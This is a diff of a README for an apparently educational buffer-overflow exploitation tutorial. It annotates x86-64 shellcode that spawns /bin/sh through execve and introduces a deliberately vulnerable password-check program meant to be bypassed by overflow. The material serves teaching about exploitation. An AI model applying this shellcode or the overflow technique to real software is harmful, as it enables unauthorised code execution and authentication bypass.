LauraWartschinski/overflow_with_joy/README.md

 "start: pop %rdi;" //take the address of the string /bin/sh from the stack "xor %rax, %rax;" //set RAX to zero
-"movb %al, 7(%rdi);" //set a nullbyte after the /bin/sh in the written file "mov $0x3b, %al;" //put the syscall number in rax, in this case execve "xor %rsi,%rsi;" //RSI must be set to zero
+"movb %al, 7(%rdi);" //set a nullbyte after the /bin/sh in the written file "mov $0x3b, %al;" //put the syscall number in RAX, in this case 0x3b for execve "xor %rsi,%rsi;" //RSI must be set to zero
 "xor %rdx,%rdx;" //RDX must be set to zero
-"syscall;" //start the
+"syscall;" //start the syscall
 ```

+Since this programm is not actually exploited, but just executes the shellcode itself, just type `./exploit1` to try it out with the shellcode payload.

 ## Hackme 2 ##

-In the next example, we are looking at a C program that was not made to be exploited, but contains a buffer overflow vulnerability.
+The first example was created specifically to execute shellcode.
+From now on, the examples will be programs that have other purposes, but contain vulnerabilities that can be exploited.

+Hackme2 contains a buffer overflow vulnerability that can be used to manipulate a variable.
 The program takes an input as argument and checks if that input is correct, displaying either "password correct" or "wrong password".
 Of course, it might execute some other functionality, but this is just a minimal example.
-The goal here is to get the program to execute the code for the correct password, without actually entering the correct password.
-If it crashes later, that's okay, since the goal was reached anyway.
+The goal here is to get the program to execute the code for the correct password, without actually entering the correct password (assuming the hacker doesn't know it).
+If the program crashes afterwards, that's okay, since the goal was reached already.

 The programm can simply be executed with `./hackme2 mypassword`.
 This is the sourcecode: